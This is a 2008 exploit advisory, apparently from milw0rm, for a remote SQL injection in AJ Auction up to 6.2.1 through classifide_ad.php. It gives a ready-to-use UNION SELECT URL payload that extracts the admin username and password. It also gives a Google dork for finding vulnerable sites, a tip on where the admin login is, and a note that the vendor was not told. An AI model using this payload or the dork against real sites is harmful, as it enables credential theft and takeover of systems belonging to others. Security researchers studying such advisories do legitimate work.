49 lines
No EOL
1.4 KiB
Text
49 lines
No EOL
1.4 KiB
Text
--==+================================================================================+==--
|
|
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
|
|
|
|
Discovered By: t0pP8uZz
|
|
Discovered On: 12 MAY 2008
|
|
Script Download: http://www.ajsquare.com/products/auction/index.php?auc=1
|
|
DORK: inurl:"classifide_ad.php"
|
|
|
|
|
|
|
|
Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
DESCRIPTION:
|
|
|
|
AJ Auction (all versions to date) suffers from a insecure mysql query, allowing a remote attacker,
|
|
to arbitrary inject mysql code/query.
|
|
|
|
the below injection will display the admin credentials.
|
|
|
|
|
|
|
|
SQL Injection's:
|
|
|
|
http://site.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*
|
|
|
|
|
|
|
|
NOTE/TIP:
|
|
|
|
admin login is at /admin/
|
|
|
|
|
|
|
|
GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
peace, t0pP8uZz
|
|
|
|
|
|
--==+================================================================================+==--
|
|
--==+ AJ Auction <= 6.2.1 (classifide_ad.php) Remote SQL Injection Vulnerability +==--
|
|
--==+================================================================================+==--
|
|
|
|
# milw0rm.com [2008-05-12] |